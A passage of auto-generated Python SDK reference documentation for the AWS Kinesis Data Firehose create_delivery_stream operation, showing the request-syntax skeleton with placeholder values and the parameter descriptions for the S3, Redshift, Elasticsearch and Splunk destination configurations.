'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
RedshiftDestinationConfiguration={
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'Password': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupConfiguration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ElasticsearchDestinationConfiguration={
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfiguration': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
]
}
},
SplunkDestinationConfiguration={
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3Configuration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream. This name must be unique per AWS account in the same AWS Region. If the delivery streams are in different accounts or different Regions, you can have multiple delivery streams with the same name.\n
:type DeliveryStreamType: string
:param DeliveryStreamType: The delivery stream type. This parameter can be one of the following values:\n\nDirectPut : Provider applications access the delivery stream directly.\nKinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.\n\n
:type KinesisStreamSourceConfiguration: dict
:param KinesisStreamSourceConfiguration: When a Kinesis data stream is used as the source for the delivery stream, a KinesisStreamSourceConfiguration containing the Kinesis data stream Amazon Resource Name (ARN) and the role ARN for the source stream.\n\nKinesisStreamARN (string) -- [REQUIRED]The ARN of the source Kinesis data stream. For more information, see Amazon Kinesis Data Streams ARN Format .\n\nRoleARN (string) -- [REQUIRED]The ARN of the role that provides access to the source Kinesis data stream. For more information, see AWS Identity and Access Management (IAM) ARN Format .\n\n\n
:type DeliveryStreamEncryptionConfigurationInput: dict
:param DeliveryStreamEncryptionConfigurationInput: Used to specify the type and Amazon Resource Name (ARN) of the KMS key needed for Server-Side Encryption (SSE).\n\nKeyARN (string) --If you set KeyType to CUSTOMER_MANAGED_CMK , you must specify the Amazon Resource Name (ARN) of the CMK. If you set KeyType to AWS_OWNED_CMK , Kinesis Data Firehose uses a service-account CMK.\n\nKeyType (string) -- [REQUIRED]Indicates the type of customer master key (CMK) to use for encryption. The default setting is AWS_OWNED_CMK . For more information about CMKs, see Customer Master Keys (CMKs) . When you invoke CreateDeliveryStream or StartDeliveryStreamEncryption with KeyType set to CUSTOMER_MANAGED_CMK, Kinesis Data Firehose invokes the Amazon KMS operation CreateGrant to create a grant that allows the Kinesis Data Firehose service to use the customer managed CMK to perform encryption and decryption. Kinesis Data Firehose manages that grant.\nWhen you invoke StartDeliveryStreamEncryption to change the CMK for a delivery stream that is encrypted with a customer managed CMK, Kinesis Data Firehose schedules the grant it had on the old CMK for retirement.\nYou can use a CMK of type CUSTOMER_MANAGED_CMK to encrypt up to 500 delivery streams. If a CreateDeliveryStream or StartDeliveryStreamEncryption operation exceeds this limit, Kinesis Data Firehose throws a LimitExceededException .\n\nWarning\nTo encrypt your delivery stream, use symmetric CMKs. Kinesis Data Firehose doesn\'t support asymmetric CMKs. For information about symmetric and asymmetric CMKs, see About Symmetric and Asymmetric CMKs in the AWS Key Management Service developer guide.\n\n\n\n
:type S3DestinationConfiguration: dict
:param S3DestinationConfiguration: [Deprecated] The destination in Amazon S3. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ExtendedS3DestinationConfiguration: dict
:param ExtendedS3DestinationConfiguration: The destination in Amazon S3. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The Amazon CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupConfiguration (dict) --The configuration for backup in Amazon S3.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nDataFormatConversionConfiguration (dict) --The serializer, deserializer, and schema for converting data from the JSON format to the Parquet or ORC format before writing it to Amazon S3.\n\nSchemaConfiguration (dict) --Specifies the AWS Glue Data Catalog table that contains the column information. This parameter is required if Enabled is set to true.\n\nRoleARN (string) --The role that Kinesis Data Firehose can use to access AWS Glue. This role must be in the same account you use for Kinesis Data Firehose. Cross-account roles aren\'t allowed.\n\nCatalogId (string) --The ID of the AWS Glue Data Catalog. If you don\'t supply this, the AWS account ID is used by default.\n\nDatabaseName (string) --Specifies the name of the AWS Glue database that contains the schema for the output data.\n\nTableName (string) --Specifies the AWS Glue table that contains the column information that constitutes your data schema.\n\nRegion (string) --If you don\'t specify an AWS Region, the default is the current Region.\n\nVersionId (string) --Specifies the table version for the output data schema. If you don\'t specify this version ID, or if you set it to LATEST , Kinesis Data Firehose uses the most recent version. This means that any updates to the table are automatically picked up.\n\n\n\nInputFormatConfiguration (dict) --Specifies the deserializer that you want Kinesis Data Firehose to use to convert the format of your data from JSON. This parameter is required if Enabled is set to true.\n\nDeserializer (dict) --Specifies which deserializer to use. You can choose either the Apache Hive JSON SerDe or the OpenX JSON SerDe. If both are non-null, the server rejects the request.\n\nOpenXJsonSerDe (dict) --The OpenX SerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the native Hive / HCatalog JsonSerDe.\n\nConvertDotsInJsonKeysToUnderscores (boolean) --When set to true , specifies that the names of the keys include dots and that you want Kinesis Data Firehose to replace them with underscores. This is useful because Apache Hive does not allow dots in column names. For example, if the JSON contains a key whose name is 'a.b', you can define the column name to be 'a_b' when using this option.\nThe default is false .\n\nCaseInsensitive (boolean) --When set to true , which is the default, Kinesis Data Firehose converts JSON keys to lowercase before deserializing them.\n\nColumnToJsonKeyMappings (dict) --Maps column names to JSON keys that aren\'t identical to the column names. This is useful when the JSON contains keys that are Hive keywords. For example, timestamp is a Hive keyword. If you have a JSON key named timestamp , set this parameter to {'ts': 'timestamp'} to map this key to a column named ts .\n\n(string) --\n(string) --\n\n\n\n\n\n\nHiveJsonSerDe (dict) --The native Hive / HCatalog JsonSerDe. Used by Kinesis Data Firehose for deserializing data, which means converting it from the JSON format in preparation for serializing it to the Parquet or ORC format. This is one of two deserializers you can choose, depending on which one offers the functionality you need. The other option is the OpenX SerDe.\n\nTimestampFormats (list) --Indicates how you want Kinesis Data Firehose to parse the date and timestamps that may be present in your input data JSON. To specify these format strings, follow the pattern syntax of JodaTime\'s DateTimeFormat format strings. For more information, see Class DateTimeFormat . You can also use the special value millis to parse timestamps in epoch milliseconds. If you don\'t specify a format, Kinesis Data Firehose uses java.sql.Timestamp::valueOf by default.\n\n(string) --\n\n\n\n\n\n\n\n\nOutputFormatConfiguration (dict) --Specifies the serializer that you want Kinesis Data Firehose to use to convert the format of your data to the Parquet or ORC format. This parameter is required if Enabled is set to true.\n\nSerializer (dict) --Specifies which serializer to use. You can choose either the ORC SerDe or the Parquet SerDe. If both are non-null, the server rejects the request.\n\nParquetSerDe (dict) --A serializer to use for converting data to the Parquet format before storing it in Amazon S3. For more information, see Apache Parquet .\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nPageSizeBytes (integer) --The Parquet page size. Column chunks are divided into pages. A page is conceptually an indivisible unit (in terms of compression and encoding). The minimum value is 64 KiB and the default is 1 MiB.\n\nCompression (string) --The compression code to use over data blocks. The possible values are UNCOMPRESSED , SNAPPY , and GZIP , with the default being SNAPPY . Use SNAPPY for higher decompression speed. Use GZIP if the compression ratio is more important than speed.\n\nEnableDictionaryCompression (boolean) --Indicates whether to enable dictionary compression.\n\nMaxPaddingBytes (integer) --The maximum amount of padding to apply. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 0.\n\nWriterVersion (string) --Indicates the version of row format to output. The possible values are V1 and V2 . The default is V1 .\n\n\n\nOrcSerDe (dict) --A serializer to use for converting data to the ORC format before storing it in Amazon S3. For more information, see Apache ORC .\n\nStripeSizeBytes (integer) --The number of bytes in each stripe. The default is 64 MiB and the minimum is 8 MiB.\n\nBlockSizeBytes (integer) --The Hadoop Distributed File System (HDFS) block size. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is 256 MiB and the minimum is 64 MiB. Kinesis Data Firehose uses this value for padding calculations.\n\nRowIndexStride (integer) --The number of rows between index entries. The default is 10,000 and the minimum is 1,000.\n\nEnablePadding (boolean) --Set this to true to indicate that you want stripes to be padded to the HDFS block boundaries. This is useful if you intend to copy the data from Amazon S3 to HDFS before querying. The default is false .\n\nPaddingTolerance (float) --A number between 0 and 1 that defines the tolerance for block padding as a decimal fraction of stripe size. The default value is 0.05, which means 5 percent of stripe size.\nFor the default values of 64 MiB ORC stripes and 256 MiB HDFS blocks, the default block padding tolerance of 5 percent reserves a maximum of 3.2 MiB for padding within the 256 MiB block. In such a case, if the available size within the block is more than 3.2 MiB, a new, smaller stripe is inserted to fit within that space. This ensures that no stripe crosses block boundaries and causes remote reads within a node-local task.\nKinesis Data Firehose ignores this parameter when OrcSerDe$EnablePadding is false .\n\nCompression (string) --The compression code to use over data blocks. The default is SNAPPY .\n\nBloomFilterColumns (list) --The column names for which you want Kinesis Data Firehose to create bloom filters. The default is null .\n\n(string) --\n\n\nBloomFilterFalsePositiveProbability (float) --The Bloom filter false positive probability (FPP). The lower the FPP, the bigger the Bloom filter. The default value is 0.05, the minimum is 0, and the maximum is 1.\n\nDictionaryKeyThreshold (float) --Represents the fraction of the total number of non-null rows. To turn off dictionary encoding, set this fraction to a number that is less than the number of distinct keys in a dictionary. To always use dictionary encoding, set this threshold to 1.\n\nFormatVersion (string) --The version of the file to write. The possible values are V0_11 and V0_12 . The default is V0_12 .\n\n\n\n\n\n\n\nEnabled (boolean) --Defaults to true . Set it to false if you want to disable format conversion while preserving the configuration details.\n\n\n\n\n
:type RedshiftDestinationConfiguration: dict
:param RedshiftDestinationConfiguration: The destination in Amazon Redshift. You can specify only one destination.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nClusterJDBCURL (string) -- [REQUIRED]The database connection string.\n\nCopyCommand (dict) -- [REQUIRED]The COPY command.\n\nDataTableName (string) -- [REQUIRED]The name of the target table. The table must already exist in the database.\n\nDataTableColumns (string) --A comma-separated list of column names.\n\nCopyOptions (string) --Optional parameters to use with the Amazon Redshift COPY command. For more information, see the 'Optional Parameters' section of Amazon Redshift COPY command . Some possible examples that would apply to Kinesis Data Firehose are as follows:\n\ndelimiter \'\\t\' lzop; - fields are delimited with 't' (TAB character) and compressed using lzop.delimiter \'|\' - fields are delimited with '|' (this is the default delimiter).\ndelimiter \'|\' escape - the delimiter should be escaped.\nfixedwidth \'venueid:3,venuename:25,venuecity:12,venuestate:2,venueseats:6\' - fields are fixed width in the source, with each width specified after every column in the table.\nJSON \'s3://mybucket/jsonpaths.txt\' - data is in JSON format, and the path specified is the format of the data.\n\nFor more examples, see Amazon Redshift COPY command examples .\n\n\n\nUsername (string) -- [REQUIRED]The name of the user.\n\nPassword (string) -- [REQUIRED]The user password.\n\nRetryOptions (dict) --The retry behavior in case Kinesis Data Firehose is unable to deliver documents to Amazon Redshift. Default value is 3600 (60 minutes).\n\nDurationInSeconds (integer) --The length of time during which Kinesis Data Firehose retries delivery after a failure, starting from the initial request and including the first attempt. The default value is 3600 seconds (60 minutes). Kinesis Data Firehose does not retry if the value of DurationInSeconds is 0 (zero) or if the first delivery attempt takes longer than the current value.\n\n\n\nS3Configuration (dict) -- [REQUIRED]The configuration for the intermediate Amazon S3 location from which Amazon Redshift obtains data. Restrictions are described in the topic for CreateDeliveryStream .\nThe compression formats SNAPPY or ZIP cannot be specified in RedshiftDestinationConfiguration.S3Configuration because the Amazon Redshift COPY operation that reads from the S3 bucket doesn\'t support these compression formats.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nProcessingConfiguration (dict) --The data processing configuration.\n\nEnabled (boolean) --Enables or disables data processing.\n\nProcessors (list) --The data processors.\n\n(dict) --Describes a data processor.\n\nType (string) -- [REQUIRED]The type of processor.\n\nParameters (list) --The processor parameters.\n\n(dict) --Describes the processor parameter.\n\nParameterName (string) -- [REQUIRED]The name of the parameter.\n\nParameterValue (string) -- [REQUIRED]The parameter value.\n\n\n\n\n\n\n\n\n\n\n\nS3BackupMode (string) --The Amazon S3 backup mode.\n\nS3BackupConfiguration (dict) --The configuration for backup in Amazon S3.\n\nRoleARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the AWS credentials. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nBucketARN (string) -- [REQUIRED]The ARN of the S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\nPrefix (string) --The 'YYYY/MM/DD/HH' time format prefix is automatically used for delivered Amazon S3 files. You can also specify a custom prefix, as described in Custom Prefixes for Amazon S3 Objects .\n\nErrorOutputPrefix (string) --A prefix that Kinesis Data Firehose evaluates and adds to failed records before writing them to S3. This prefix appears immediately following the bucket name. For information about how to specify this prefix, see Custom Prefixes for Amazon S3 Objects .\n\nBufferingHints (dict) --The buffering option. If no value is specified, BufferingHints object default values are used.\n\nSizeInMBs (integer) --Buffer incoming data to the specified size, in MiBs, before delivering it to the destination. The default value is 5. This parameter is optional but if you specify a value for it, you must also specify a value for IntervalInSeconds , and vice versa.\nWe recommend setting this parameter to a value greater than the amount of data you typically ingest into the delivery stream in 10 seconds. For example, if you typically ingest data at 1 MiB/sec, the value should be 10 MiB or higher.\n\nIntervalInSeconds (integer) --Buffer incoming data for the specified period of time, in seconds, before delivering it to the destination. The default value is 300. This parameter is optional but if you specify a value for it, you must also specify a value for SizeInMBs , and vice versa.\n\n\n\nCompressionFormat (string) --The compression format. If no value is specified, the default is UNCOMPRESSED .\nThe compression formats SNAPPY or ZIP cannot be specified for Amazon Redshift destinations because they are not supported by the Amazon Redshift COPY operation that reads from the S3 bucket.\n\nEncryptionConfiguration (dict) --The encryption configuration. If no value is specified, the default is no encryption.\n\nNoEncryptionConfig (string) --Specifically override existing encryption information to ensure that no encryption is used.\n\nKMSEncryptionConfig (dict) --The encryption key.\n\nAWSKMSKeyARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the encryption key. Must belong to the same AWS Region as the destination Amazon S3 bucket. For more information, see Amazon Resource Names (ARNs) and AWS Service Namespaces .\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n\nCloudWatchLoggingOptions (dict) --The CloudWatch logging options for your delivery stream.\n\nEnabled (boolean) --Enables or disables CloudWatch logging.\n\nLogGroupName (string) --The CloudWatch group name for logging. This value is required if CloudWatch logging is enabled.\n\nLogStreamName (string) --The CloudWatch log stream name for logging. This value is required if CloudWatch logging is enabled.\n\n\n\n\n
:type ElasticsearchDestinationConfiguration: dict
